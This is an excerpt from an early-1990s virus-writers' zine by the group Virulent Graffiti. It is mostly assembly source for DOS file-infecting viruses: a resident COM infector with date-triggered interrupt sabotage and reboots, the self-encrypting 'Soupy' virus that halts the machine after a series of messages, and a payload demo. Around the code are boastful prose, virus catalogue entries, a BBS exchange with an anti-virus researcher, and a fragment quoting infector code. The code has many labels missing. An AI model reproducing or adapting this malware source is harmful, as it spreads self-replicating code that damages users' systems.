        mov     byte ptr ds:[102h], 1                   ; bytes of COM
        xor     ax,ax                                   ; Interrupt Table
        mov     ds,ax

        cmp     word ptr ds:[6Bh*4], 4246h              ; check 1st ruthere
        jne     installus

        cmp     word ptr ds:[6Bh*4+2], 2206h            ; check 2nd ruthere
        je      alreadyinstalled

        call    installvirusinmemory
        jmp     short alreadyinstalled
        nop                                             ; F!#K
        mov     word ptr ds:[6Bh*4], 4246h              ; set RUTHERE's      
        mov     word ptr ds:[6Bh*4+2], 2206h
        push    cs                                      ; cs = ds
        pop     ds
        mov     ax, 3521h                               ; get int 21h
        int     21h                                     ; vector
        mov     si, offset gobackfromwhenceyoucame      ; save int 21h
        mov     [si+1], bx                              ; vector
        mov     [si+3], es
        push    es
        push    bx
        pop     dx
        pop     ds
        mov     ax, 256Dh                               ; int 6dh = int 21h
        int     21h
        mov     si, offset intovirus
        mov     ax, 40h                                 ; bios
        mov     ds, ax
        mov     ax, ds:[0013h]                          ; (0040:0013=280h)
        mov     cl, 6
        shl     ax, cl                                  ; shift to segment
        sub     ax, 800h                                ; minus 800 paras
        mov     es, ax                                  ; in ES
        xor     di, di                                  ; destination 0
        mov     cx, endofvirus - intovirus              ; ieterations
        push    cs                                      ; cs = ds
        pop     ds
        rep     movsb                                   ; copy it
        mov     ax, 2521h                               ; set int 21h
        push    es
        pop     ds
        mov     dx, int_21_handler - intovirus
        int     21h
        mov     si, 17h
        mov     byte ptr [si], 0
        call    debuggerreboot
        push    cs
        push    cs
        pop     ds
        pop     es
        mov     ax, offset start
        jmp     ax                                      ; advance to go
        mov     ax, 0F000h                              ; hi bios
        mov     ds, ax
        mov     dx, offset 0FFF0h                       ; ssi = reboot
        mov     ax, 2501h
        int     21h
        mov     ax, 2503h                               ; brkpt = reboot
        int     21h
        push    ax
        push    bx
        push    cx
        push    dx
        push    di
        push    si
        push    es
        push    ds
        mov     ah, 2Ah                                 ; get date
        int     6Dh
        cmp     cx, 7C7h                                ; is year 1991
        jb      datenogood                              ; Jump if below
        cmp     dl, 16h                                 ; is date 22nd
        jne     onwardguys                              ; nope

        db      0eah, 0F0H, 0FFH, 00, 0F0H              ; reboot

        mov     ah, 25h                                 ; set int vector
        cmp     dl, 1Dh                                 ; is date 29th
        je      dateisthe29th
        cmp     dl, 1                                   ; is date 1st
        je      dateisthe1st
        cmp     dl, 0Ah                                 ; is date 10th
        je      dateisthe10th
        cmp     dl, 10h                                 ; is date 16th
        je      dateisthe16th
        jmp     short datenogood
        nop                                             ; F!#K

        mov     al, 13h                                 ; disks
        jmp     short setvector
        nop                                             ; F!#K

        mov     al, 16h                                 ; keyboard
        jmp     short setvector
        nop                                             ; F!#K

        mov     al, 0Dh                                 ; fixed disk
        jmp     short setvector
        nop                                             ; F!#K

        mov     al, 10h                                 ; video

        push    cs                                      ; ds = cs
        pop     ds
        mov     dx, bigproblems - intovirus
        int     6Dh

        mov     ax, 40h                                 ; bios
        mov     ds, ax
        mov     ax, ds:[006Eh]                          ; clicks since 12AM
        mov     bx, ds:[006Ch]
        push    cs                                      ; ds = cs
        pop     ds
        mov     si, 0017h                               ; keyboard status
        mov     cl, ds:[si]
        cmp     cl, 1                                   ; only right shift
        je      noactivate
        ; this here checks for approximately 3:10 to 3:15 vicinity

        cmp     ax, 0Fh                                 ; timer hi = 0fh
        jne     noactivate
        cmp     bx, 2AA8h                               ; timer lo < 2AA8h
        jb      noactivate
        cmp     bx, 3774h                               ; timer lo > 3774h
        ja      noactivate
        mov     byte ptr [si], 1                        ; right shift only
        mov     ax, 3509h                               ; get int 9 vector
        int     21h
        push    es
        push    bx
        pop     dx
        pop     ds
        mov     ax, 256Ah                               ; int 6ah = int 9
        int     21h
        push    cs
        pop     ds
        mov     dx, int_9_handler - intovirus           ; set our int 9
        mov     ax, 2509h
        int     21h

        pop     ds
        pop     es
        pop     si
        pop     di
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        cmp     ah, 4Bh                                 ; execute call?
        je      yeppersitsanexecute

gobackfromwhenceyoucame:                                ; return to int 21h
        db      0EAh                                    ; jmp far ptr 
        db      60h, 14h, 02fh, 02h                     ; old int 21h vector

        pop     es
        pop     ds
        pop     bp
        pop     di
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        jmp     short gobackfromwhenceyoucame

        mov     ax, 2524h                               ; set int 24h
        mov     si, old24 - intovirus
        mov     dx, cs:[si]
        mov     ds, cs:[si+2]
        int     21h
        push    cs
        pop     ds
        mov     si, filetime - intovirus                ; set file time
        mov     cx, [si]
        mov     dx, [si+2]
        mov     ax, 5701h
        int     21h
        mov     ah, 3Eh                                 ; close it up
        int     21h
        mov     si, fileofs - intovirus                 ; load address
        mov     dx, cs:[si]
        mov     ds, cs:[si+2]
        mov     ax, 4301h                               ; set attribs back
        mov     si, attribs - intovirus 
        mov     cl, cs:[si]
        xor     ch, ch
        int     21h
        jmp     short returntoitall

        push    ax
        push    bx
        push    cx
        push    dx
        push    si
        push    di
        push    bp
        push    ds
        push    es
        mov     ax, 4300h                               ; get attributes
        int     21h
        jc      okayreamit                              ; bad file?

        mov     si, attribs - intovirus                 ; save attribs
        mov     cs:[si], cl
        mov     si, fileofs - intovirus                 ; save file address
        mov     cs:[si], dx
        mov     cs:[si+2], ds
        mov     ax, 3524h                               ; get int 24h vector
        int     21h
        mov     si, old24 - intovirus                   ; save int 24h
        mov     cs:[si], bx
        mov     cs:[si+2], es
        mov     ax, 2524h                               ; set int 24h
        push    cs
        pop     ds
        mov     dx, bigproblems - intovirus
        int     21h
        mov     si, fileofs - intovirus                 ; reload file addr
        mov     dx, cs:[si]
        mov     ds, cs:[si+2]
        mov     ax, 4301h                               ; set attributes
        mov     cx, 20h                                 ; archive
        int     21h
        jc      allpurposeerror                         ; catch criticals

        mov     ax, 3D02h                               ; open for write
        int     21h
        jc      allpurposeerror                         ; more error checks
        mov     bx, ax                                  ; F!#K
        mov     ax, 5700h                               ; get file time
        int     21h
        jc      allpurposeerror                         ; more error checks!
        mov     si, filetime - intovirus                ; save file time
        push    cs
        pop     ds
        mov     [si], cx
        mov     [si+2], dx
        mov     ah, 3Fh                                 ; read 2 bytes into
        mov     cx, 2
        mov     dx, (furtherintovirus + 4) - intovirus  ; buffer
        int     21h
        jc      allpurposeerror                         ; damn these checks!
        mov     si, (buffa2 - 2) - intovirus
        cmp     word ptr [si], 5A4Dh                    ; misnamed exe ?!?
        je      allpurposeerror                         ; fuckin' checks
        mov     ah, 3Fh                                 ; read 1 byte into
        mov     cx, 1
        mov     dx, (furtherintovirus + 10) - intovirus ; buffer
        int     21h
        jc      allpurposeerror                         ; !!!
        mov     ax, 4202h                               ; LSeek end
        xor     cx, cx
        xor     dx, dx
        int     21h
        jc      allpurposeerror                         ; AARRRGGGHHH!!!
        cmp     dx, 0                                   ; if size > 65535
        jg      allpurposeerror
        cmp     ax, 4                                   ; if size < 4
        jb      allpurposeerror
        cmp     ax, 0FBF0h                              ; if size > 64496
        ja      allpurposeerror
        mov     si, sizestore - intovirus               ; save size
        mov     [si], ax
        mov     cx, ax                                  ; size in cx
        sub     ax, 3                                   ; mod for jmp near
        mov     si, (jumpnear + 1) - intovirus          ; save size - 3
        mov     [si], ax
        add     cx, 100h                                ; size + 100h
        mov     si, (modme1 + 1) - intovirus
        mov     [si], cx                                ; modify first delta
        add     cx, 151h                                ; size + 251h
        mov     si, (modme2 + 1) - intovirus
        mov     [si], cx                                ; modify 2nd delta
        jmp     short continueinfect
        nop                                             ; F!#K
        jmp     okayreamit

        mov     ax, 4200h                               ; LSeek from start
        xor     cx, cx                                  ; Size - 2
        mov     si, sizestore - intovirus
        mov     dx, [si]
        sub     dx, 2
        int     21h
        mov     ah, 3Fh                                 ; read 2 bytes
        mov     cx, 2
        mov     dx, saved2 - intovirus
        int     21h
        mov     si, saved2 - intovirus                  ; load saved 2
        mov     ax, [si]
        cmp     ax, 2206h                               ; infected?
        je      allpurposeerror
        mov     ax, 4200h                               ; LSeek start
        xor     cx, cx
        xor     dx, dx
        int     21h
        mov     ah, 40h                                  ; write jmp near
        mov     cx, 3
        mov     dx, jumpnear - intovirus
        int     21h
        mov     ax, 4202h                               ; LSeek end
        xor     cx, cx
        xor     dx, dx
        int     21h
        mov     si, what - intovirus                    ; inc counter
        inc     word ptr [si]
        mov     si, what2 - intovirus
        push    word ptr [si]
        mov     word ptr [si], 0
        mov     ah, 40h                                 ; write file
        mov     dx, intovirus - intovirus               ; duh!
        mov     cx, endofvirus - intovirus
        int     21h
        mov     si, what - intovirus                    ; dec counter
        dec     word ptr [si]
        pop     ax                                      ; pop off other valu
        inc     ax
        mov     si, what2 - intovirus                   ; save other valu
        mov     [si], ax
        jmp     okayreamit
        xor     al,al                                   ; a little xtreme?!?
        push    ax
        push    ds
        mov     ax, 0040h                               ; bios
        mov     ds, ax
        mov     ah, byte ptr ds:[006ch]                 ; clicks afta 12 AM
        cmp     ah, 17h                                 ; past time?
        ja      itsallover
        and     ah, 6
        or      ds:[0017h], ah                          ; fuck that flag!!!
        pop     ds
        pop     ax
        int     6ah

        db      06h, '"'
        end     start

        I saw no need to write a stand-alone demonstration for this rather
 unflattering virus,  as  it displays  nothing, and only  disables  device
 access and fucks with the keyboard...
                              Soupy Virus Source
                           By The Attitude Adjuster 

        With the  release  of this  virus marks  the  absolute  end  for all
 boring  direct-action COM  infectors from  Virulent Graffiti... if some pop
 up  in  the  future, bearing  our  name,  and  do not have revolutionary or
 funny activation stages, they are NOT from us...

        Anyway,  I am  at a loss as to why I should use anything but the DOC
 I wrote for this, but,  here's what Patti says, and what I say, you compare
 and contrast who does it better!

 Virus Name:  Soupy
 V Status:    New
 Discovered:  January, 1993
 Symptoms:    .COM file growth; TSR; message; system hangs
 Origin:      United States
 Eff Length:  1,072 Bytes
 Type Code:   PRC - Parasitic Resident .COM Infector
 Detection Method:  Novi 1.15a+, CPAV/N
 Removal Instructions:  Delete infected files
 General Comments:
       The Soupy virus was submitted in January, 1993, and is from the
       United States.  Soupy is a non-resident, direct action infector
       of .COM programs, but not COMMAND.COM.  In the case of advanced
       infections, it may install a portion of itself memory resident in
       order to facilitate the activation mechanism in the virus.

       When a program infected with the Soupy virus is executed, the
       Soupy virus will infect one .COM file located in the current
       directory, as well as update a counter within the viral code.
       Programs infected with the Soupy virus will have a file length
       increase of 1,072 bytes with the virus being located at the end
       of the file.  The program's date and time in the DOS disk directory
       listing will not be altered.

       The Soupy virus activates once the counter within the viral code
       has reached 11, indicating the 11th generation of the virus has
       been reached.  At this time, the virus will install a portion of
       itself in memory of 736 bytes, hooking interrupt 08.  Once the
       memory resident portion of the virus has been installed, it will
       display the following messages one at a time every three minutes:

               "Unsuspecting user, 12 o'clock!"
               "Get ready... 'cause... THERE'S A VIRUS IN YOUR SOUP!"
               "From the guys that brought you Lythyum, Radyum, and
                VioLite comes:"
               "The Soupy Virus, (k) 1992 VG Enterprises,
               "By The Attitude Adjuster & AccuPunk!"
               "Hurry! Hire an Anti-Virus Professional!
                Increase Wallet Space!"
               "...hmmm, ya' know, I think I''ll halt now..."
       Once the last message above is displayed, the system will be
       halted or hung.  The above messages are encrypted within the
       Soupy viral code, as are the following additional text strings:

               "[Soupy] The Attitude Adjuster & AccuPunk,
                VG 08/23/92 to 12/02/92"
               "Bad command or file name"
 ...and now me...

 Virus Name:  Soupy 
 Aliases:     Virus in Your Soup
 Author:      The Attitude Adjuster & AccuPunk
 Group:       Virulent Graffiti
 Scan ID:         
 V Status:    Frozen to Death
 Discovery:   See, we were in this guy's disk box...
 Symptoms:    .COM files altered; Messages;
 Orgin:       West Bumblefuck, Ohio
 Eff Length:  1073 Bytes
 Res Length:  736 Bytes
 Type Code:   Parasitic Non-Resident .COM Infector
 Detection Method: 
 Removal Instructions:  Delete infected files

 General Comments:

       The Soupy virus is a self-encrypting direct action infector
       of .COM programs. The virus, upon execution, will search the
       current directory for an uninfected .COM program. If none
       are found, the virus will restore the host file and continue
       The Soupy virus mantains an infection counter. When this counter
       reaches 11, the virus will check for a copy of itself in memory,
       and if not found, make itself the owner of INT 8 and go
       Approximately every 3 minutes, the virus will display the next
       of 7 messages, finally causing the machine to do a dynamic
       halt on the final message.
        And,  just  to get  the story  straight, I  wrote  all the resident
 stuff out  of boredom, and, the  COM engine was what AccuPunk presented as
 his coding example to join the group. I just optomized the code, and added
 my residency, and I was ready to go... 

        This  virus sucks... mainly because I didn't know enough back then,
 but, that has all changed... 
;          -] "Oh, waiter [-           A virus to pay tribute to
;         ==]             [==          Anti-Virus Professionals Everywhere!
;          -]   THERE'S   [-
;           ]             [
;          -]      A      [-           Radyum's Little Son
;         ==]             [==
;          -]    VIRUS    [-
;           ]             [            We like Bob Ross, but, we like
;          -]    IN MY    [-           ourselves a lot better.
;         ==]             [==
;          -]   SOUP!!!"  [-
;       An original virus by Accu-Punk and The Attitude Adjuster
;       of Virulent Graffiti (216/914/513/602)

;       Greetz: Mom, My Modem, Accu-Punk, The Attitude Adjuster,
;               The Fly, Casper, Chief, Mercury, any other VG Member.

.model tiny
.code                   ; code segment, tiny model -- CS = DS = ES = SS

ComStart        EQU     100h     

     org 100h           ; generate .COM file

     db 0e9h, 00, 00    ; Jmp decrypt

     mov        si, offset start_code     
     mov        cx, (offset end_code - offset start_code)/2
     db         81h, 34h, 0, 0                          ; xor word ptr [bx],0 
     loop       code_loop

start_code:                                             ; get delta
     call       get_delta
     pop        bp
     sub        bp, offset get_delta

     xor        ax, ax
     mov        ds, ax

     les        ax, ds:[24h*4]                           ; Load Int 24 Entry
     mov        word ptr Cs:[offset I_24+2+bp], es       ; Save it
     mov        word ptr Cs:[offset I_24+bp], ax

     lea        dx, Cs:[offset int_24h_entry+bp]         ; Place new one
     mov        word ptr ds:[24h*4], dx
     mov        word ptr ds:[92h], cs
     push       cs
     push       cs
     pop        ds
     pop        es

     cld                                                 ; Restore COM   
     mov        cx, 3
     mov        di, 100h
     lea        si, [bp+first_3]
     rep        movsb

     lea        dx, [bp+newDTA]                          ; Set Up New DTA  
     mov        ah, 1ah
     int        21h

     lea        dx, [bp+com_mask]                        ; Find First *.COM    
     mov        ah, 4eh
     mov        cx, 7
     int        21h
     jc         done_infecting                           ; If Error, Exit  

     mov        ax, 3d00h                                ; Open File for Read  
     lea        dx, [bp+newDTA+1Eh]  
     int        21h                  
     jc         find_next                                ; Find another  

     xchg       ax, bx                                   ; Handle in BX  

     mov        ah, 3fh                                  ; Read File
     mov        cx, 3
     lea        dx, [bp+buffer]
     int        21h

     mov        ah, 3eh
     int        21h

     cmp        word ptr [bp+newDTA+1Eh], 'OC'           ; Command.Com?
     je         find_next

     cmp        word ptr [bp+newDTA+1Ah], (65535-(heap_end - start_code))
     ja         find_next                                ; too big

     cmp        word ptr [bp+newDTA+1Ah], 300h
     jb         find_next                                ; too little bitty
     mov        ax, word ptr [bp+newDTA+1Ah]
     push       ax
     sub        ax, (end_code - decrypt) + 3             ; correct JMP
     cmp        ax, word ptr [bp+buffer+1]
     je         find_next                                ; not to end!
     jmp        infect
     mov        ah, 4fh
     jmp        find_loop 

     mov        ah, 1ah
     mov        dx, 0080h
     int        21h                                      ; set up old DTA

     pop        ax

     xor        ax,ax
     push       ax
     pop        ds
     les        ax, ds:[08h*4]
     push       cs
     pop        ds

     mov        word ptr [Old08+Bp], Ax
     mov        word ptr [Old08+2+Bp], Es
     add        ax, ((GetOut-1)-Int_08_Handler)
     mov        bx, ax
     cmp        word ptr Es:[Bx], 0EA58h
     je         quit
     push       cs
     pop        es
     cmp        byte ptr [Counter+Bp], 0ah
     jle        quit
     lea        Si, [Offset Int_08_Handler+Bp]           ; copy us
     mov        Di, 0100h
     mov        Cx, Offset End_Handler-Offset Int_08_Handler
     rep        MovSb
     xor        ax, ax                                   ; interrupt table
     mov        ds, ax
     mov        ax, 100h
     mov        word ptr Ds:[08h*4], ax
     mov        word ptr Ds:[08h*4+2], cs
     push       cs
     pop        ds
     push       cs

     mov        ah, 49h                                  ; Deallocate Env.
     mov        bx, word ptr cs:[02ch]
     mov        es, bx
     int        21h
     pop        es

     Mov        ah, 9
     Lea        dx, [Offset Bullshit+Bp]
     Int        21h
     Mov        Ax, 3100h
     mov        Dx, (((Offset End_Handler-Offset Int_08_Handler)+100h) / 16) + 1
     Int        21h     
     Int        20h     
     xor        ax, ax
     mov        ds, ax

     mov        bx, word ptr Cs:[offset I_24+bp]
     mov        es, word ptr Cs:[offset I_24+2+bp]

     mov        word ptr ds:[24h*4], bx                  ; Restore int 24h
     mov        word ptr ds:[24h*4+2], es

     push       cs
     push       cs
     pop        ds
     pop        es

     mov        dx, 100h                                 ; We Are Done!
     jmp        dx

     lea        si, [bp+buffer]          
     lea        di, [bp+first_3]
     push       si
     mov        cx, 3
     rep        movsb                    ; save original first three bytes 
     pop        di                       ; now we write to the buffer...
     mov        al, 0e9h                 ; change first three bytes of target file
     stosb                               ; to jump to the end, which will be the
     pop        ax                       ; first byte of the viral code.
     sub        ax, 3                    ; correct for the jump opcode size
     stosw                               ; and put the displacement at [DI].

     xor        cx, cx
     lea        dx, [bp+newDTA+1Eh]
     mov        ax, 4301h                ; set attributes to nothing
     int        21h

     mov        ah, 3dh
     mov        al, 2                    ; read/write
     int        21h
     xchg       ax,bx               ; ok, we're gonna be boring and use XCHG

     mov        ah, 40h             ; bx = filehandle
     mov        cx, 3
     lea        dx, [bp+buffer]
     int        21h                      ; write 3 bytes at buffer to file
     mov        ax, 4202h                ; LSEEK from end of file
     xor        cx, cx                   ; seek 0 bytes from end
     xor        dx, dx                   ; set up for copying the virus
     int        21h

     push       bx
get_new_code:                      ; get new encryption word
     mov        bx, 40h 
     mov        es, bx
     mov        bx, 6Ch
     mov        dx, word ptr es:[bx]     ; dx = encryption_word
     or         dx, dx                   ; dx == 0? (no effect)
     jz         get_new_code             ; nah, get a new one
     mov        word ptr [bp+code_loop+2], dx         
     pop        bx
     push       cs
     pop        es

     push       ax

     lea        di, [bp+temp]
     mov        al, 53h                       ; push bx
     lea        si, [bp+decrypt]
     mov        cx, start_code-decrypt        ; copy the code unaltered first
     push       si
     push       cx                       
     rep        movsb                         ; copy decrypt
     lea        si, [bp+write]            
     mov        cx, end_write-write
     rep        movsb                         ; copy write
     pop        cx
     pop        si
     rep        movsb                         ; copy decrypt again
     mov        ax, 0C35Bh                    ; POP BX, retn
     pop        ax                            ; ax = filesize

     mov        dx, word ptr [bp+decrypt+1]   ; dx = offset start_code rel 100h
     sub        dx, bp
     sub        dx, 3
     add        dx, ax                        ; add filesize to offset
     mov        word ptr [bp+decrypt+1], dx   ; patch it

     inc        byte ptr [bp+counter]
     call       temp

     mov        ax, 5701h
     mov        cx, word ptr [bp+newDTA+16h]  ; cx = file time
     mov        dx, word ptr [bp+newDTA+18h]  ; dx = file date
     int        21h
     xor        cx, cx
     mov        ax, 4301h
     mov        cl, byte ptr [bp+newDTA+15h]  ; cl = attributes
     lea        dx, [bp+newDTA+1Eh]
     int        21h

     mov        ah, 3eh
     int        21h
     jmp        done_infecting

     pop        bx
     mov        ah, 40h
     mov        cx, end_code - decrypt
     lea        dx, [bp+decrypt]
     int        21h
     push       bx

Int_24h_Entry   Proc    Far
        Mov     Ax, 3                                   ; Process Terminate
        Iret                                            ; Do a LOT, Eh?

Int_08_Handler  Proc    Far
        Push    Ax
        Push    Bx
        Push    Cx
        Push    Dx
        Push    Si
        Push    Di
        Push    Bp
        Push    Es
        Push    Ds

        Dec     Word Ptr Cs:[TCounter]
        Jz      Do_It

        Pop     Ds
        Pop     Es
        Pop     Bp
        Pop     Di
        Pop     Si
        Pop     Dx
        Pop     Cx
        Pop     Bx
        Pop     Ax

         Db      0eah    ; JMP Far PTR
Old08    Dd      ?

_Iet     Db      1
_Counter Dw      1092

        Push    Cs
        Push    Cs
        Pop     Es
        Pop     Ds

        Mov     Word Ptr Cs:[TCounter], 1092

        Mov     Si, Start_Chain
        Xor     Cx, Cx
        Mov     Cl, Byte Ptr Cs:[Iet]
        Xor     Ax, Ax
        Add     Si, Ax
        Loop    Chain_Loop

        Xor     Cx, Cx
        Mov     Cl, Al
        XChg    Bp, Si        
        Mov     Ah, 0fh
        Int     10h

        Mov     Ax, 1300h
        Mov     Bx, 000Fh
        Xor     Dx, Dx
        Int     10h
        Inc     Byte Ptr Cs:[Iet]
        Mov     Cx, 50
        Push    Cx
        Mov     Cx, 0ffffh
        Loop    RP
        Pop     Cx
        Loop    C2
        Cmp     Byte Ptr Cs:[Iet], 8
        Je      Quonto
        Jmp     LeaveRite
        Jmp     $

db 0
db 30, 'Unsuspecting user, 12 o''clock!'
db 52, 'Get ready... ''cause... THERE''S A VIRUS IN YOUR SOUP!'
db 66, 'From the guys that brought you Lythyum, Radyum, and VioLite comes:'
db 61, 'The Soupy Virus, (k) 1992 VG Enterprises, 216/513/602/914/703'
db 36, 'By The Attitude Adjuster & AccuPunk!'
db 62, 'Hurry! Hire an Anti-Virus Professional! Increase Wallet Space!'
db 43, '...hmmm, ya'' know, I think I''ll halt now...'

Start_Chain     = (_Start_Chain - Int_08_Handler) + 100h
End_Chain       = (_End_Chain - Int_08_Handler) + 100h
Iet             = (_Iet  - Int_08_Handler) + 100h
TCounter        = (_Counter - Int_08_Handler) +100h


name_date db   00,'[Soupy]  The Attitude Adjuster & AccuPunk, VG',00
          db   '08/23/92 to 12/02/92',00
first_3   db   0CDh, 20h, 90h      ; put return to dos opcodes at 100h
com_mask  db   '*.COM',0
counter   db   0
BullShit  db   'Bad command or file name',0dh,0ah,'

end_code = $   ; end of encryption and writing...

buffer    db   3 dup (?)
newDTA    db   50 dup (?)
I_24      dd   ?
temp:     db   ((start_code - decrypt)*2 + (end_write-write) + 5) dup (?)

heap_end = $   ; marks end of heap
        end  entry
; Very shitty and hurredly written stand alone demonstration for the Soupy
; virus, By The Attitude Adjuster.

; Assemble with:
;  tasm sbomb /m2
;  tlink sbomb /t

;  Wait for the messages! No delays have been removed!

.model tiny

     org 100h
     mov        ax, 3508h
     int        21h

     mov        word ptr [Old08], Bx
     mov        word ptr [Old08+2], Es
     add        ax, ((GetOut-1)-Int_08_Handler)
     mov        bx, ax
     cmp        word ptr Es:[Bx], 0EA58h
     je         quit
     push       cs
     pop        es
     mov        dx, offset Int_08_Handler
     mov        ax, 2508h
     int        21h
     Mov        ah, 9
     Lea        dx, [Offset Bullshit+Bp]
     Int        21h
     mov        Dx, Offset Heap_End
     Int        27h     
     Int        20h     

Int_08_Handler  Proc    Far
        Push    Ax
        Push    Bx
        Push    Cx
        Push    Dx
        Push    Si
        Push    Di
        Push    Bp
        Push    Es
        Push    Ds

        Dec     Word Ptr Cs:[Counter]
        Jz      Do_It

        Pop     Ds
        Pop     Es
        Pop     Bp
        Pop     Di
        Pop     Si
        Pop     Dx
        Pop     Cx
        Pop     Bx
        Pop     Ax

         Db      0eah    ; JMP Far PTR
Old08    Dd      ?

Iet     Db      1
Counter Dw      1092

        Push    Cs
        Push    Cs
        Pop     Es
        Pop     Ds

        Mov     Word Ptr Cs:[Counter], 1092

        Mov     Si, Offset Start_Chain
        Xor     Cx, Cx
        Mov     Cl, Byte Ptr Cs:[Iet]
        Xor     Ax, Ax
        Add     Si, Ax
        Loop    Chain_Loop

        Xor     Cx, Cx
        Mov     Cl, Al
        XChg    Bp, Si        
        Mov     Ah, 0fh
        Int     10h

        Mov     Ax, 1300h
        Mov     Bx, 000Fh
        Xor     Dx, Dx
        Int     10h
        Inc     Byte Ptr Cs:[Iet]
        Mov     Cx, 50
        Push    Cx
        Mov     Cx, 0ffffh
        Loop    RP
        Pop     Cx
        Loop    C2
        Cmp     Byte Ptr Cs:[Iet], 8
        Je      Quonto
        Jmp     LeaveRite
        Jmp     $

db 0
db 30, 'Unsuspecting user, 12 o''clock!'
db 52, 'Get ready... ''cause... THERE''S A VIRUS IN YOUR SOUP!'
db 66, 'From the guys that brought you Lythyum, Radyum, and VioLite comes:'
db 61, 'The Soupy Virus, (k) 1992 VG Enterprises, 216/513/602/914/703'
db 36, 'By The Attitude Adjuster & AccuPunk!'
db 62, 'Hurry! Hire an Anti-Virus Professional! Increase Wallet Space!'
db 43, '...hmmm, ya'' know, I think I''ll halt now...'

BullShit  db   'Bad command or file name',0dh,0ah,'

end_code = $   ; end of encryption and writing...

heap_end = $   ; marks end of heap
        end  entry
                             Rapidly Approaching
                          By The Attitude Adjuster

        Virulent Graffiti  is  rapidly  approaching 1  year of life, amazing
 that we could hold together that long, eh? We actually survived the summer,
 the return of the  school year... the fact  that we were doing nothing, and
 an abrupt name change, VG to VGVPO.

        Actually,  I  am approaching  the 1  year  mark  on  learning  80x86
 assembly...  quite strange,  a year later, to look back that the total shit
 code that  I was  doing in WASM, and to see some of the things I was doing,
 and actually calling viruses!

        On the  personal level,  I am  quite happy with myself, and greatful
 of the  people like  the Dark Avenger, Dark Angel, and others that have the
 know-how and desire to  help  teach the  world about  virus  writing.  I am
 amazed at  the progress that I have made myself, both in virus writing, and
 in programming in  general... and especially that I have the highest poster
 status on Digital Warfare Private (at least, when I wrote this...)

        On the group  level,  I feel deflated, but good... an idea that was
 pushed onto  me by The Fly, on March 14th,  1992, becoming the  semi-large
 thing that  it  has become  today... really nice, if you ask me, but, then
 again, who does...

        Now comes  the question of what I'm going to do this year... We have
 lots of  things waiting in the wings for that little extra push to get them
 going... a  sub-stealth  virus,  a  multipartite  virus,  and a little code
 generator (not for generating viruses, but, for generating dazzingly boring
 encryption and decryption routines,  without actaully  being a polymorphing
 engine!)...  hopefully,  little side  projects I  have, like loaders, sound
 routines, and such will fall into place, and we can grab a little ground in
 the demo-group world as well...

        Big ideas  for a  kid from  a small town in Ohio, eh? Maybe... maybe
 not... Certainly,  in Telcom,  no  one  is there  to  ask my age, or for my
 college degree...  all  I need  to do  is whip out a little code, throw the
 reputation around  a little... wire them a couple hund- err, you get what I
 mean... It's all open to us, sounds fun, eh?
 Damn straight it is...
                            The Confusion Ended?
                          By The Attitude Adjuster

        In  the  end,  we  decided it would better if we began releasing our
 research viruses  to  anti-virus professionals (bah!).  I  called  Patricia
 Hoffman's board, cringing  at the  thought  of...  Wildcat! (it  just isn't
 right  without  the !). I  construct an  account, promptly  forgetting  the
 password I assigned to it, and, uploaded our old and useless COM infectors.

        After  the gloriously  short upload (9600 is great...), I left Patti
 this little letter...

From    : T.A. ADJUSTER                          Number    : 52 of 59
To      : PATRICIA HOFFMAN                       Date      : 01/17/93 6:01pm
Subject : Uploads                                Reference : NONE
Read    : 01/18/93 12:11pm (REPLIES)             Private   : NO
Conf    : 002 - Virus Q & A (Open Msgs)
I have uploaded to you some OLD VG viruses, as we are now doing TSR
COM/EXE infectors. Hopefully, when we move on to boot infectors, we
will remember to upload those here as well.

In the meantime, please send these to whoever does research work for
you, as I'm sure it can't be you, I mean, you don't even know your own

Anyway, they all have DOC files with them, that are totally correct,
though I may have 'forgot' and left out a couple of features. None of
these viruses are intentionally distructive, just loads and loads of

Anyway, if you want to be the index of ALL viruses, you better move to
place these in the index, as they are on our support boards, and can be
downloaded and placed active by anyone, though we as a group will not
release viruses into the wild.
I thought I had an account on here earlier. Yeesh, I hope you didn't
delete it... anyway, I'd like to ask that you keep my account live, as
I enjoy downloading your fine VSUM publication. VG is too poor to
afford to register it, however. Could we get, maybe, a charity
The Attitude Adjuster
        So... a  few days later, I  note this reply, when I log in to see if
 the new VSUM is out yet...

From    : PATRICIA HOFFMAN                       Number    : 54 of 59
To      : T.A. ADJUSTER                          Date      : 01/18/93 12:15pm
Subject : Uploads                                Reference : 52
Read    : NO                                     Private   : NO
Conf    : 002 - Virus Q & A (Open Msgs)
Well, the only time I don't know my own name is when someone calls the
wrong "Patricia Hoffman" because they got the phone number from
Information or the phone book.  My home phone number is unlisted, but
there are a couple of other Patricia Hoffman's in Silicon Valley as
well.  If you are referring to a certain conference call of about 9-10
months ago when 13 or so young men tried to contact me, they called the
WRONG Patricia Hoffman..... I was at home reading a novel, and didn't
know about the call until McAfee called and asked why I didn't speak to
the "young men".  
        Well... interesting...  the truth?  Who knows... I'd kind of like to
 talk to her,  regardless... I just have  nothing that dials alliance, and I
 really would like to share the experience with others...
                          'Shit... What's wrong NOW!'
                            By The Attitude Adjuster

        (Written in early January, pre-VioLite ][ and DWI release.)

        So, AccuPunk and  I are  hard at  work, coding litle bits of drivel,
 and our  two main  projects, DWI  and  VioLite ][. For some strange reason,
 these viruses  refused to  work. We  spent many hours in our protected-mode
 debuggers tracking  down the  cause, but,  it  was finally my genius, and a
 little work in DOS Debug that saved the day.

        The  virus  engines  worked  fine,  the resident  code  in DWI being
 okay, and  the file-location code in VioLite2 being dandy. When traced thru
 in both SoftIce and Debug, the  viruses would work, but, yet, when ran from
 a command line, or let loose with a Go instruction,  my machine would crash
 a horrible GPF death, while AccuPunk's  would not.  He  has a 386DX, I have
 a new 486SX, this is the key.

        Here is the root of the problem.

 Taken from 'An Introduction to Non-Overwriting Virii,' 40Hex-8
            mov  ax,es                    ; AX = PSP segment
            add  ax,10h                   ; Adjust for PSP
            add  word ptr cs:[si+jmpsave+2],ax
            add  ax,word ptr cs:[si+stacksave+2]
            cli                           ; Clear intrpts for stack manip.
            mov  sp,word ptr cs:[si+stacksave]
            mov  ss,ax
            db   0eah                ; jmp ssss:oooo
jmpsave          dd ?                ; Original CS:IP
stacksave        dd ?                ; Original SS:SP
jmpsave2         dd 0fff00000h       ; Needed for carrier file
stacksave2       dd ?

        We were using this  clip of DA code, mainly because it was the Right
 Thing, and why try and improve on perfection.  Alas, this  code is the root
 of all the problems.

        I assemble the following code:
.model tiny
        org     100h

        mov     byte ptr [start], 0cch          ; place int 3 at 100h

        mov     ax, cs                          ; codeseg in ax

